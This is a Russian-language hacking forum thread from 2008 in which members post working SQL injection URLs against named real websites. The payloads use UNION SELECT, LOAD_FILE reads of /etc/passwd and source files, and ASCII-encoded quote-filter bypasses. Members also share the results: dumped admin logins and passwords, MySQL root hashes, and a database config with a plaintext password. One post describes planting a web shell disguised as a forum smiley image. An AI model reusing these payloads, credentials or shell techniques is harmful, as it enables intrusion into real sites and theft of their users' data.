21.07.2008, 03:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Сообщение от tor4)
cms bitrixs
http://www.romantrahtenberg.ru/
http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5,6,7,8,9,10,11,version (),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32/*
Подобрать не получилось, (((
там 5 колонок
Код:
http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5/*
|
|
|
21.07.2008, 04:43
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
гы этж битрикс.... ))
прева b_ , таблы login и пассворд
_http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CON CAT(login,char(59),password)+FROM+b_user+LIMIT+0,1 )),0x71),0x71),18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32/*
admin;5d93ceb70e2bf5daa84ec3d0cd2c731a;qwer1234
Валим в админку .... и через смалики на форуме заливаемс элегантный шелленг:
_http://www.romantrahtenberg.ru/bitrix/images/forum/icon/mod_abble.php.gif
конфиги:
$DBHost = "localhost";
$DBLogin = "trax";
$DBPassword = "8gB1Q83N";
$DBName = "trax";
Последний раз редактировалось slider; 21.07.2008 в 04:48..
|
|
|
|
21.07.2008, 16:52
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами:
9450895
Репутация:
41
|
|
)) спс.
вывод есть как из комментариев так и в название
шел почемуто не нашол.
Последний раз редактировалось tor4); 21.07.2008 в 18:18..
|
|
|
|
21.07.2008, 20:22
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
С нами:
9414616
Репутация:
18
|
|
http://www.inderscience.com/
Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: papers
User name: santiago@localhost
[1]:root:01957ef668e6d197
[2]:root:
[3]:debian-sys-maint:6b67408243591682
[4]:santiago:67988dfe49fa907a
[5]:gringo:6b39e3a056217c98
[6]:idsonsusy:20cc5448310bcc55
[7]:webmaster:11e578da277c0f17
[8]:bizshoe:2bf7d9725ea14fce
http://www.inderscience.com/mapper.php?id=31 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6 A626567696E,LOAD_FILE(0x2F7661722F7777772F61706163 6865322D64656661756C742F6874646F63732F696E6465782E 706870),0x7873716C696E6A656E64),0x71),0x71) LIMIT 1,1/* - чтение сорсов.
Google Page Rank - 7
Последний раз редактировалось Cmucl; 22.07.2008 в 03:22..
|
|
|
|
21.07.2008, 21:07
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://chelzoo.ru/board_more.php?start=3296&rub=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),user())--
4.0.27
chelzooru@localhost
|
|
|
|
22.07.2008, 00:58
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
www.ub.bw PR-6
version() - 5.0.51
file_priv - Y
к сожалению ковычки фильтруются, обходим их с помощью ASCII кодов...
PHP код:
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
PHP код:
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
root:*605A9A272BF59FE166F769C3536B032DD66858F6
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
root:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
Два рута =) |
|
|
|
22.07.2008, 18:56
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/*
database() = adacorg@64.13.232.25
user() = adac_org_au_-_content
version() = 4.1.11-Debian_4sarge7
вход в админку
www.adac.org.au/intranet.php
не подобрал поле пароля ..
пользователи:
5:jimmy
2:francz
3:helen
4:scott
6:byron
7:katie
8:warren
9:geoff
10:sharon
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*
|
|
|
|
22.07.2008, 21:04
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username,userpass),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*
|
|
|
|
22.07.2008, 20:40
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Vsem prijatnogo vremeni sutak
ja vot nashol forum : http://89.136.42.95
No nekak nemogu razobratsa kak zdelot SQL injection . Moshet ktonibut obesnit
|
|
|
|
22.07.2008, 21:02
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Saiga
Там нельзя ее сделать (вроде) ошибки на главной это просто какие то ошибки с обработкой базы mysql
А вообще тут на против есть тема для вопросов вот туда лучше обратиться
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
